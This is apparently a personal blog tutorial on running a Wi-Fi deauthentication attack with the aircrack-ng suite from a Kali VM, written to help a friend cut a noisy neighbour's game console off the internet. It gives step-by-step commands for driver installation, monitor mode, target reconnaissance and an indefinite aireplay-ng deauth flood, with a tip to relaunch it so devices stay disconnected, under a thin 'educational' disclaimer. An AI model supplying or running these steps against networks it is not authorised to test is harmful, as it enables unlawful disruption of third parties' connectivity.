A few weeks ago, a friend of mine reached out to me asking “What could he do?” regarding an extremely noisy neighbor who spends every night, all night long, playing video games and shouting loudly and angry at the console. He shouts so loudly that doesn't let anybody sleep. LoL.
My first thought was to use a jammer device to inhibit the Wi-Fi signal during the night, and hopefully prevent the noisy neighbor from being able to play online. However, jammers are not easy to purchase due to legal reasons. While it’s possible to build them at home, I opted for an easier, old-school alternative: a simple Wi-Fi DeAuth Attack.
I’m writing this little guide for my friend and for educational purposes for you. Feel free to experiment with your own network ;)
REQUIREMENTS
I will use an Apple MacBook with an M1 chip because that’s my friend's notebook. However, we cannot inject network packets directly from MacOS, so I will quickly spin up a Kali VM using UTM. I recommend UTM instead of VMWare or VirtualBox for Apple's M* chips.
UTM for MacOS: https://mac.getutm.app
Kali .iso file for Arm64 (chip M): https://cdimage.kali.org/kali-2023.3/kali-linux-2023.3-installer-arm64.iso
(you can always check for the latest release at the official page)Tutorial to run Kali on UTM: https://www.kali.org/docs/virtualization/install-utm-guest-vm/.
If you don’t have a MacBook, even better; run your favorite Linux distribution on your notebook and install the aircrack-ng suite :)
Another requirement is to have a Wi-Fi interface with a chipset that supports packet injection. I recommend an Alfa or the classic TP-LINK WN722N.
DRIVERS INSTALLATION
Once you have the Kali VM (or the aircrack-ng installation) ready, you will likely need to install the drivers for the RTL8812AU chipset (Alfa) or RTL8188EUS chipset (TP-LINK).
How do you know if you need the drivers? Connect your Wi-Fi interface to your VM or notebook via USB, and run the iwconfig
command. If you don’t see a wlan0
or any wireless interface in the output, then unfortunately, you need to install the drivers.
Note: If you are using UTM, please make sure to allow the USB interface at the top right corner of the view.
Kali will likely still not detect your Wi-Fi interface.
So, let’s install the drivers. The installation procedure is nearly identical for both cases.
Steps for the RTL8188EUS (TP-LINK).
$ git clone https://github.com/aircrack-ng/rtl8188eus
$ cd rtl8188eus
$ make && sudo make install
$ reboot
Steps for the RTL8812AU (Alfa):
$ sudo apt-get install dkms
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl*
$ sudo make dkms_install
$ reboot
After the reboot, if we run the iwconfig
command again, we should now be able to see the wireless interface, yay!
WI-FI DEAUTH ATTACK
So, we are now ready for action! The idea is to execute a Wi-Fi deauth attack against the target network. This will disconnect all devices connected to it, including the computer or video game console.
First of all, let's put our Wi-Fi interface into monitor mode.
$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0
Now, let's gather the necessary information from our target network.
$ sudo airodump-ng wlan0
The output will look as follows:
Basically, we can observe:
BSSID: Mac Address of the Access Point
PWR: In simple terms, it’s the distance from the Access Point
CH: Wi-Fi channel
ESSID: Access Point name
For a successful packet injection attack, the distance from the targeted access point is critical: the closer, the better. How can you determine if you are close or far away? Observe the PWR information; the closer the number is to zero, the closer you are to the access point. In the picture above, I will target the access point with a PWR of -41, as it’s my router and the closest to me.
Let's go! Execute the deauth packet injection attack as follows:
$ sudo aireplay-ng --deauth 0 -a {{TARGET_BSSID}} wlan0
If it's working, you will see in the output that aireplay is successfully injecting packets. Note that the above command will deauthenticate all the devices connected to the target network
While we let that run, devices should not be able to reconnect to the Wi-Fi. If that’s not the case, you can always automate the re-launch of the command every few minutes ;)
Note: In case you encounter the following error:
It seems aireplay-ng
is attempting to inject on the wrong channel. I resolved this by stopping and then restarting the interface in monitor mode, but this time specifying the channel of the target network (you can obtain the channel from the airodump-ng
information). Note the '11' at the end of the start command.
That's all! I want to thank my friend for taking me back to the past for a while. It's been so long since I last engaged in these basic Wi-Fi 101 hacking stuff, and I had a lot of fun ;)
Thank you for reading.
Sheila A. Berta (@UnaPibaGeek)